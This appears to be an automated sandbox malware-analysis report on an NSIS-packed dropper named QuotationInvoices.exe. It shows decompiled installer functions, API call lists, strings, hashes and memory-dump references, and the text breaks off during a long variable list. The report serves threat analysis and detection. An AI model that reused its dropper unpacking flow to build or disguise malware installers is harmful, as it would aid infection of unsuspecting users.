API String ID: 1975747703-2397608325
Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\QuotationInvoices.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\jones\\Desktop\\QuotationInvoices.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\QuotationInvoices.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}

0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f72
0x00402f77
0x00402f79
0x00403067
0x00403069
0x00403075
0x00000000
0x00000000
0x0040307e
0x004030aa
0x004030b5
0x004030be
0x004030bf
0x004030c4
0x004030d5
0x004030db
0x004030e1
0x004030e7
0x004030f1
0x0040310c
0x00403115
0x0040311a
0x00403139
0x00403149
0x0040315b
0x00403160
0x00403168
0x00403175
0x0040317d
0x00403182
0x00403184
0x00403184
0x0040318a
0x0040318a
0x0040318d
0x0040318f
0x0040318f
0x00403191
0x00403193
0x00403193
0x0040319d
0x004031a9
0x00000000
0x004031ae
0x00000000
0x00403168
0x00000000
0x0040311c
0x00403086
0x00403098
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f7f
0x00402f84
0x00402f88
0x00402f8f
0x00402f96
0x00402f98
0x00402f98
0x00402fa7
0x00403128
0x0040316a
0x00000000
0x0040316a
0x00402fb3
0x00403037
0x0040303a
0x0040303f
0x00000000
0x00403037
0x00402fc0
0x00402fc5
0x00402fcd
0x00402ff3
0x00403002
0x00403008
0x0040300d
0x00403013
0x00000000
0x00000000
0x0040301d
0x00403025
0x00403028
0x0040302d
0x0040302f
0x0040302f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040301d
0x00403040
0x00403046
0x00403056
0x00403056
0x00403059
0x0040305f
0x0040305f
0x00000000
0x00402f7f

APIs

GetTickCount.KERNEL32 ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QuotationInvoices.exe,00000400), ref: 00402F21

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QuotationInvoices.exe,C:\Users\user\Desktop\QuotationInvoices.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF

Strings

C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
Error launching installer, xrefs: 00402F41
soft, xrefs: 00402FE1
Inst, xrefs: 00402FD8
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 00402EF1
Null, xrefs: 00402FEA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\QuotationInvoices.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QuotationInvoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1641589337
Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\jones\AppData\Local\Temp\nsc875C.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\jones\AppData\Local\Temp\nsc875C.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401786
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc875C.tmp\System.dll$Call
API String ID: 1941528284-2654887435
Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 100042E6, Relevance: 12.0, APIs: 4, Strings: 1, Instructions: 3274
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E100042E6(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				short _v216;
				short _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				short _v260;
				short _v262;
				short _v264;
				short _v266;
				short _v268;
				short _v270;
				short _v272;
				short _v274;
				short _v276;
				short _v278;
				short _v280;
				short _v282;
				short _v284;
				short _v286;
				short _v288;
				short _v290;
				short _v292;
				short _v294;
				short _v296;
				short _v298;
				short _v300;
				short _v302;
				short _v304;
				short _v306;
				short _v308;
				short _v310;
				short _v312;
				short _v314;
				short _v316;
				short _v318;
				short _v320;
				short _v322;
				short _v324;
				short _v326;
				short _v328;
				short _v330;
				short _v332;
				short _v334;
				short _v336;
				short _v338;
				short _v340;
				short _v342;
				short _v344;
				short _v346;
				short _v348;
				short _v350;
				short _v352;
				short _v354;
				short _v356;
				short _v358;
				short _v360;
				short _v362;
				short _v364;
				short _v366;
				short _v368;
				short _v370;
				short _v372;
				short _v374;
				short _v376;
				short _v378;
				short _v380;
				short _v382;
				short _v384;
				short _v386;
				short _v388;
				short _v390;
				short _v392;
				short _v394;
				short _v396;
				short _v398;
				short _v400;
				short _v402;
				short _v404;
				short _v406;
				short _v408;
				short _v410;
				short _v412;
				short _v414;
				short _v416;
				short _v418;
				short _v420;
				short _v422;
				short _v424;
				short _v426;
				short _v428;
				short _v430;
				short _v432;
				short _v434;
				short _v436;
				short _v438;
				short _v440;
				short _v442;
				short _v444;
				short _v446;
				short _v448;
				short _v450;
				short _v452;
				short _v454;
				short _v456;
				short _v458;
				short _v460;
				short _v462;
				short _v464;
				short _v466;
				short _v468;
				short _v470;
				short _v472;
				short _v474;
				short _v476;
				short _v478;
				short _v480;
				short _v482;
				short _v484;
				short _v486;
				short _v488;
				short _v490;
				short _v492;
				short _v494;
				short _v496;
				short _v498;
				short _v500;
				short _v502;
				short _v504;
				short _v506;
				short _v508;
				short _v510;
				short _v512;
				short _v514;
				short _v516;
				short _v518;
				short _v520;
				short _v522;
				short _v524;
				short _v526;
				short _v528;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				short _v538;
				short _v540;
				short _v542;
				short _v544;
				short _v546;
				short _v548;
				short _v550;
				short _v552;
				short _v554;
				short _v556;
				short _v558;
				short _v560;
				short _v562;
				short _v564;
				short _v566;
				short _v568;
				short _v570;
				short _v572;
				short _v574;
				short _v576;
				short _v578;
				short _v580;
				short _v582;
				short _v584;
				short _v586;
				short _v588;
				short _v590;
				short _v592;
				short _v594;
				short _v596;
				short _v598;
				short _v600;
				short _v602;
				short _v604;
				short _v606;
				short _v608;
				short _v610;
				short _v612;
				short _v614;
				short _v616;
				short _v618;
				short _v620;
				short _v622;
				short _v624;
				short _v626;
				short _v628;
				short _v630;
				short _v632;
				short _v634;
				short _v636;
				short _v638;
				short _v640;
				short _v642;
				short _v644;
				short _v646;
				short _v648;
				short _v650;
				short _v652;
				short _v654;
				short _v656;
				short _v658;
				short _v660;
				short _v662;
				short _v664;
				short _v666;
				short _v668;
				short _v670;
				short _v672;
				short _v674;
				short _v676;
				short _v678;
				short _v680;
				short _v682;
				short _v684;
				short _v686;
				short _v688;
				short _v690;
				short _v692;
				short _v694;
				short _v696;
				short _v698;
				short _v700;
				short _v702;
				short _v704;
				short _v706;
				short _v708;
				short _v710;
				short _v712;
				short _v714;
				short _v716;
				short _v718;
				short _v720;
				short _v722;
				short _v724;
				short _v726;
				short _v728;
				short _v730;
				short _v732;
				short _v734;
				short _v736;
				short _v738;
				short _v740;
				short _v742;
				char _v744;
				short _v748;
				short _v750;
				short _v752;
				short _v754;
				short _v756;
				short _v758;
				short _v760;
				short _v762;
				short _v764;
				short _v766;
				short _v768;
				short _v770;
				short _v772;
				short _v774;
				short _v776;
				short _v778;
				short _v780;
				short _v782;
				short _v784;
				short _v786;
				short _v788;
				short _v790;
				short _v792;
				short _v794;
				short _v796;
				short _v798;
				short _v800;
				short _v802;
				short _v804;
				short _v806;
				short _v808;
				short _v810;
				short _v812;
				short _v814;
				short _v816;
				short _v818;
				short _v820;
				short _v822;
				short _v824;
				short _v826;
				short _v828;
				short _v830;
				short _v832;
				short _v834;
				short _v836;
				short _v838;
				short _v840;
				short _v842;
				short _v844;
				short _v846;
				short _v848;
				short _v850;
				short _v852;
				short _v854;
				short _v856;
				short _v858;
				short _v860;
				short _v862;
				short _v864;
				short _v866;
				short _v868;
				short _v870;
				short _v872;
				short _v874;
				short _v876;
				short _v878;
				short _v880;
				short _v882;
				short _v884;
				short _v886;
				short _v888;
				short _v890;
				short _v892;
				short _v894;
				short _v896;
				short _v898;
				short _v900;
				short _v902;
				short _v904;
				short _v906;
				short _v908;
				short _v910;
				short _v912;
				short _v914;
				short _v916;
				short _v918;
				short _v920;
				short _v922;
				short _v924;
				short _v926;
				short _v928;
				short _v930;
				short _v932;
				short _v934;
				short _v936;
				short _v938;
				short _v940;
				short _v942;
				short _v944;
				short _v946;
				short _v948;
				short _v950;
				short _v952;
				short _v954;
				short _v956;
				short _v958;
				short _v960;
				short _v962;
				short _v964;
				short _v966;
				short _v968;
				short _v970;
				short _v972;
				short _v974;
				short _v976;
				short _v978;
				short _v980;
				short _v982;
				short _v984;
				short _v986;
				short _v988;
				short _v990;
				short _v992;
				short _v994;
				short _v996;
				short _v998;
				short _v1000;
				short _v1002;
				short _v1004;
				short _v1006;
				short _v1008;
				short _v1010;
				short _v1012;
				short _v1014;
				short _v1016;
				short _v1018;
				short _v1020;
				short _v1022;
				short _v1024;
				short _v1026;
				short _v1028;
				short _v1030;
				short _v1032;
				short _v1034;
				short _v1036;
				short _v1038;
				short _v1040;
				short _v1042;
				short _v1044;
				short _v1046;
				short _v1048;
				short _v1050;
				short _v1052;
				short _v1054;
				short _v1056;
				short _v1058;
				short _v1060;
				short _v1062;
				short _v1064;
				short _v1066;
				short _v1068;
				short _v1070;
				short _v1072;
				short _v1074;
				short _v1076;
				short _v1078;
				short _v1080;
				short _v1082;
				short _v1084;
				short _v1086;
				short _v1088;
				short _v1090;
				short _v1092;
				short _v1094;
				short _v1096;
				short _v1098;
				short _v1100;
				short _v1102;
				short _v1104;
				short _v1106;
				short _v1108;
				short _v1110;
				short _v1112;
				short _v1114;
				short _v1116;
				short _v1118;
				short _v1120;
				short _v1122;
				short _v1124;
				short _v1126;
				short _v1128;
				short _v1130;
				short _v1132;
				short _v1134;
				short _v1136;
				short _v1138;
				short _v1140;
				short _v1142;
				short _v1144;
				short _v1146;
				short _v1148;
				short _v1150;
				short _v1152;
				short _v1154;
				short _v1156;
				short _v1158;
				short _v1160;
				short _v1162;
				short _v1164;
				short _v1166;
				short _v1168;
				short _v1170;
				short _v1172;
				short _v1174;
				short _v1176;
				short _v1178;
				short _v1180;
				short _v1182;
				short _v1184;
				short _v1186;
				short _v1188;
				short _v1190;
				short _v1192;
				short _v1194;
				short _v1196;
				short _v1198;
				short _v1200;
				short _v1202;
				short _v1204;
				short _v1206;
				short _v1208;
				short _v1210;
				short _v1212;
				short _v1214;
				short _v1216;
				short _v1218;
				short _v1220;
				short _v1222;
				short _v1224;
				short _v1226;
				short _v1228;
				short _v1230;
				short _v1232;
				short _v1234;
				short _v1236;
				short _v1238;
				short _v1240;
				short _v1242;
				short _v1244;
				short _v1246;
				short _v1248;
				short _v1250;
				short _v1252;
				short _v1254;
				short _v1256;
				short _v1258;
				short _v1260;
				short _v1262;
				short _v1264;
				short _v1266;
				short _v1268;
				short _v1270;
				short _v1272;
				short _v1274;
				short _v1276;
				short _v1278;
				short _v1280;
				short _v1282;
				short _v1284;
				short _v1286;
				short _v1288;
				short _v1290;
				short _v1292;
				short _v1294;
				short _v1296;
				short _v1298;
				short _v1300;
				short _v1302;
				short _v1304;
				short _v1306;
				short _v1308;
				short _v1310;
				short _v1312;
				short _v1314;
				short _v1316;
				short _v1318;
				short _v1320;
				short _v1322;
				short _v1324;
				short _v1326;
				short _v1328;
				short _v1330;
				short _v1332;
				short _v1334;
				short _v1336;
				short _v1338;
				short _v1340;
				short _v1342;
				short _v1344;
				short _v1346;
				short _v1348;
				short _v1350;
				short _v1352;
				short _v1354;
				short _v1356;
				short _v1358;
				short _v1360;
				short _v1362;
				short _v1364;
				short _v1366;
				short _v1368;
				short _v1370;
				short _v1372;
				short _v1374;
				short _v1376;
				short _v1378;
				short _v1380;
				short _v1382;
				short _v1384;
				short _v1386;
				short _v1388;
				short _v1390;
				short _v1392;
				short _v1394;
				short _v1396;
				short _v1398;
				short _v1400;
				short _v1402;
				short _v1404;
				short _v1406;
				short _v1408;
				short _v1410;
				short _v1412;
				short _v1414;
				short _v1416;
				short _v1418;
				short _v1420;
				short _v1422;
				char _v1424;
				short _v1428;
				short _v1430;
				short _v1432;
				short _v1434;
				short _v1436;
				short _v1438;
				short _v1440;
				short _v1442;
				short _v1444;
				short _v1446;
				short _v1448;
				short _v1450;
				short _v1452;
				short _v1454;
				short _v1456;
				short _v1458;
				short _v1460;
				short _v1462;
				short _v1464;
				short _v1466;
				short _v1468;
				short _v1470;
				short _v1472;
				short _v1474;
				short _v1476;
				short _v1478;
				short _v1480;
				short _v1482;
				short _v1484;
				short _v1486;
				short _v1488;
				short _v1490;
				short _v1492;
				short _v1494;
				short _v1496;
				short _v1498;
				short _v1500;
				short _v1502;
				short _v1504;
				short _v1506;
				short _v1508;
				short _v1510;
				short _v1512;
				short _v1514;
				short _v1516;
				short _v1518;
